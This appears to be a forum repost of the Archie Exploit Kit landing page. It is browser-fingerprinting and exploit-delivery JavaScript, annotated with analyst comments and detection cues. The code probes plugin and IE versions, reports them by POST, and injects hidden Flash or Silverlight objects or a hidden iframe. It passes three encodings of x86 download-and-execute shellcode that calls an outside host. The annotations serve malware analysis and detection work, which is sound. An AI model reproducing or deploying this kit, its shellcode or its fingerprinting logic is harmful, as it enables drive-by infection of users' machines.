Nytro

Archie Exploit Kit


    

*** @PhysicalDrive0 ***

2 <html>
3 <head>
4 <script type="text/javascript" src="pluginDet.js"></script>
5 <style type="text/css">
6 html, body { height: 100%; overflow: auto; }
7 body { padding: 0; margin: 0; }
8 #form1 { height: 99%; }
9 #silverlightControlHost { text-align:center; }
10 </style>
11 <meta http-equiv="X-UA-Compatible" content="IE=edge" />
12 </head>
13 <body>
14 </body>
15 <script>
// Analyst note: three string blobs that are handed unchanged to the plugin
// content below (payload -> flashlow.swf, payload2 -> flashhigh.swf,
// payload3 -> silverapp1.xap). They look like one x86 byte sequence in three
// encodings: a hex string, comma-separated little-endian dwords (with extra
// leading and trailing dwords), and base64 - confirm by decoding.
// IoC recoverable from the blobs: the ASCII-hex tail of `payload` and the
// base64 tail of `payload3` both decode to the URL
// hxxp://144.76.36[.]67:8083/dd (defanged here). The fragments "urlm"/"on"
// and "e.dll" are also visible as immediates, which suggests a
// download-and-run stage via urlmon - presumption, verify in a disassembler.
// The long literals are wrapped mid-string by the paste; the wrap is kept as found.
16 var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000
8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3";
17 var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351
5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358";
18
19 var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA=";
20
// spanAppend(val): creates a <span>, appends it to document.body, then assigns
// `val` to its innerHTML, so the markup string is parsed into the live DOM.
// In this listing it is only called by flashLow, flashHigh and silverHigh,
// each passing an <object>/<form> string that embeds plugin content.
// The span is attached before innerHTML is set, so the plugin object is
// instantiated as soon as the assignment runs.
21 function spanAppend(val)
22 {
23 var a = document.createElement("span");
24 document.body.appendChild(a);
25 a.innerHTML = val;
26 }
27
// flashLow(): injects a 1x1 Flash <object> (ActiveX classid form) that loads
// "flashlow.swf" and passes the hex string `payload` through FlashVars as `id`.
// Called for Branch 1, which the dispatch switch labels "2014-0497"
// (presumably CVE-2014-0497 - confirm against the SWF).
// Detection cues visible here: a 1x1 object, allowScriptAccess=always, and a
// very long hex-only FlashVars value. The markup literal is wrapped mid-token
// by the paste ("valu" / "e=") and is kept as found.
28 function flashLow()
29 {
30 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu
e="true" /></object>');
31 }
32
// flashHigh(): injects a 1x1 Flash <object> that loads "flashhigh.swf" and
// passes `payload2` (the comma-separated 0x... dword list) as FlashVars `sh`.
// Called for Branch 2, which the dispatch switch labels "2014-0515"
// (presumably CVE-2014-0515 - confirm against the SWF).
// The element id "23kjsdf" is a fixed literal in this sample and may be
// usable as a content signature.
33 function flashHigh()
34 {
35 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>');
36 }
37
// silverHigh(): injects a Silverlight <object> inside a form/div wrapper,
// with source "silverapp1.xap" and the base64 string `payload3` passed via
// InitParams as `payload`. Called for Branch 3 (Silverlight in the targeted
// version range and no Flash branch selected).
// The markup literal is wrapped mid-identifier by the paste ("p" / "ayload3")
// and is kept as found.
38 function silverHigh()
39 {
40 spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p
ayload3+'" /></object></div></form>');
41 }
42
// fV(val): thin wrapper returning PluginDetect.isMinVersion("Flash", val).
// Callers in this page compare the result with 1 and -0.1; presumably 1 means
// "installed version is at least val" and -0.1 means "installed but older" -
// confirm against pluginDet.js, which is not part of this listing.
43 function fV(val)
44 {
45 return PluginDetect.isMinVersion("Flash", val);
46 }
47
// sV(val): thin wrapper returning PluginDetect.isMinVersion("Silverlight", val).
// Used below with the same 1 / -0.1 comparisons as fV; the meaning of those
// return values comes from pluginDet.js and should be confirmed there.
48 function sV(val)
49 {
50 return PluginDetect.isMinVersion("Silverlight", val);
51 }
52
// ie(turl): appends a 10x10 iframe with frameBorder 0 and src = turl to
// document.body. Property names are held in short string variables and
// applied with bracket access, so literal ".src"/".width" never appear next
// to the iframe object - a light obfuscation that defeats naive string
// matching. Every variable here is assigned without `var` and therefore
// becomes a global.
53 function ie(turl)
54 {
55 w = "frameBorder";
56 r = "width";
57 q = "iframe";
58 s = "height";
// `z` is assigned but not read in this function (createElement is called directly).
59 z = "createElement";
60 c = "src";
61 g = '10';
62 hh = turl;
63 ha = document.createElement(q);
64 ha[w] = '0';
65 ha[r] = g;
66 ha[s] = g;
// Sets the iframe src; `b` receives the same value and is not used afterwards here.
67 b = ha[c] = hh;
68 document.body.appendChild(ha);
69 return;
70 }
71
// ieVerOk(): user-agent check that returns true only when the UA has an
// "MSIE" token, does not contain "Win64;", and reports Trident major version
// 4, 5 or 6 (the Trident values conventionally reported by IE 8, 9 and 10).
// Returns false otherwise or on any exception.
// Not called anywhere in the visible listing. RegExp methods are invoked via
// the string "test" in `t` (bracket access), and all locals are implicit globals.
72 function ieVerOk()
73 {
74 t = "test";
75 try {
76 j = window.navigator.userAgent.toLowerCase();
77 x = /MSIE[\/\s]\d+/i [t](j);
78 m = /Win64;/i [t](j);
// RegExp.$1 holds the digit captured by the Trident test on the same line.
79 z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null;
80 if (!m && x && z && (z == 6 || z == 5 || z == 4)) {
81 return true
82 }
83 } catch (exc) {}
84 return false
85 }
86
// ieVer(): estimates an Internet Explorer major version by feature presence
// rather than by user-agent string, checked from newest to oldest:
// window.msCrypto -> 11, window.atob -> 10, document.addEventListener -> 9,
// window.JSON && document.querySelector -> 8, window.XMLHttpRequest -> 7,
// otherwise (or on exception) 0.
// The function does not itself verify that the browser is IE; in this page it
// is only called when arch() returned non-zero, i.e. after the ActiveXObject
// probe did not throw. `t` is assigned but not read here.
87 function ieVer() {
88 t = "test";
89 try {
90 if (window.msCrypto)
91 return 11;
92 if (window.atob)
93 return 10;
94 if (document.addEventListener)
95 return 9;
96 if (window.JSON && document.querySelector)
97 return 8;
98 if (window.XMLHttpRequest)
99 return 7;
100 } catch (exc) { }
101 return 0
102 }
103
// arch(): local-file-presence probe used as an OS bitness check.
// It creates a Microsoft.XMLDOM ActiveX object and loads a DOCTYPE whose
// system identifier is a res:// URL for iexplore.exe under
// "c:\Program Files (x86)", then reads parseError.errorCode.
// Returns 64 when the code equals -2147023083 (0x80070715; presumably the
// error produced when the file exists but the resource lookup fails - confirm),
// 32 when the object loads but the code differs, and 0 when anything throws
// (for example when ActiveXObject is unavailable, i.e. not IE).
// Detection cue: script-supplied XML containing a "res://" path into
// Program Files combined with a parseError.errorCode comparison.
104 function arch() {
105 try
106 {
107 var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
108 xmlDoc.async = false;
109 xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
110 if (xmlDoc.parseError.errorCode == -2147023083)
111 {
112 return 64;
113 }
114 }
115 catch (ex)
116 {
117 return 0;
118 }
119 return 32;
120 }
121
// Fingerprinting stage: collects plugin versions through PluginDetect and
// picks a delivery branch. Branch stays 0 unless one of the checks below matches.
122 var flashVer = PluginDetect.getVersion("Flash");
123 var Branch = 0;
// Exact-match list of Flash builds (11.0 through 11.2) routed to Branch 1 (flashLow).
124 if (flashVer == "11,0,1,152"
125 || flashVer == "11,1,102,55" || flashVer == "11,1,102,62"
126 || flashVer == "11,1,102,63" || flashVer == "11,2,202,228"
127 || flashVer == "11,2,202,233" || flashVer == "11,2,202,235")
128 Branch = 1;
129
130
// Two version windows routed to Branch 2 (flashHigh): result 1 for the lower
// bound and -0.1 for the upper bound, i.e. presumably
// 11,3,300,257 <= installed < 11,7,700,276 and 11,8,800,94 <= installed < 13,0,0,183.
// These overwrite Branch 1 if both kinds of check were to match.
131 if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1))
132 Branch = 2;
133 if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1))
134 Branch = 2;
135
// Silverlight window, same comparison scheme: presumably
// 4,0,50401,0 <= installed < 5,1,10412,0.
136 var silverVer = PluginDetect.getVersion("Silverlight");
137 var silverBranch = 0;
138 if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1)
139 silverBranch = 1;
140
141
// The Adobe Reader version is collected and reported, but adoberBranch is never
// changed or read in the visible listing.
142 var adoberVer = PluginDetect.getVersion("AdobeReader");
143 var adoberBranch = 0;
144
// ieVer() is only consulted when arch() returned 32 or 64, i.e. when the
// ActiveXObject probe did not throw.
145 var archSys = arch();
146 var ieVersion = 0;
147 if (archSys != 0)
148 ieVersion = ieVer();
149
// Reporting stage: builds a form-style body
//   dump=<flash>|<silverlight>|<reader>|<arch>|<ieVersion>|<Branch>&ua=<userAgent>&ref=<referrer>
// and sends it with a synchronous POST to the same-origin path "/foo".
// Each part is passed through encodeURI, which leaves characters such as
// "&" and "=" inside the user agent or referrer unescaped.
// Detection cue: POST to /foo whose body starts with "dump=" followed by
// pipe-separated plugin version strings.
150 var sendstr = "";
151 sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch);
152 sendstr += encodeURI("&ua=" + window.navigator.userAgent);
153 sendstr += encodeURI("&ref=" + document.referrer);
154
// Fallback selection happens after sendstr was built, so the reported Branch
// value is the Flash-only decision (0, 1 or 2), not the final one.
// Branch 3: no Flash match but Silverlight in range. Branch 4: still 0 and
// the ActiveX probe succeeded.
155 if (Branch == 0 && silverBranch == 1)
156 Branch = 3;
157 if (Branch == 0 && archSys != 0)
158 Branch = 4;
159
// Third argument `false` makes the request synchronous; any failure is
// silently ignored so the dispatch below still runs.
160 try
161 {
162 var xmlhttp = new XMLHttpRequest();
163 xmlhttp.open("POST", "/foo", false);
164 xmlhttp.send(sendstr);
165 }
166 catch (exc){}
167
168
// Dispatch stage: exactly one delivery path runs per page load, chosen by Branch.
//   1 -> flashLow()   (flashlow.swf, author label "2014-0497")
//   2 -> flashHigh()  (flashhigh.swf, author label "2014-0515")
//   3 -> silverHigh() (silverapp1.xap)
//   0 or 4 -> hidden iframe to "/iebasic.html"
// The numeric labels are the author's own comments and presumably refer to
// CVE identifiers - confirm against the referenced SWF files.
// Related request paths for detection, all relative to the landing page:
// pluginDet.js, flashlow.swf, flashhigh.swf, silverapp1.xap, /iebasic.html, /foo.
169 switch (Branch)
170 {
171 //2014-0497
172 case 1:
173 flashLow();
174 break;
175
176 //2014-0515
177 case 2:
178 flashHigh();
179 break;
180
181 case 3:
182 silverHigh();
183 break;
184
// Branch 0 (nothing matched, including non-IE browsers) shares the iframe path with Branch 4.
185 case 0:
186 case 4:
// Disabled alternative left by the author: it would have passed a 32/64-bit flag to "/phazar.html".
187 //var avar = archSys == 32 ? 0 : 1;
188 //ie("/phazar.html?a="+avar);
189
190 ie("/iebasic.html");
191 break;
192 }
193
194
195 </script>
196 </html>

Sursa: Archie Exploit Kit - Pastebin.com
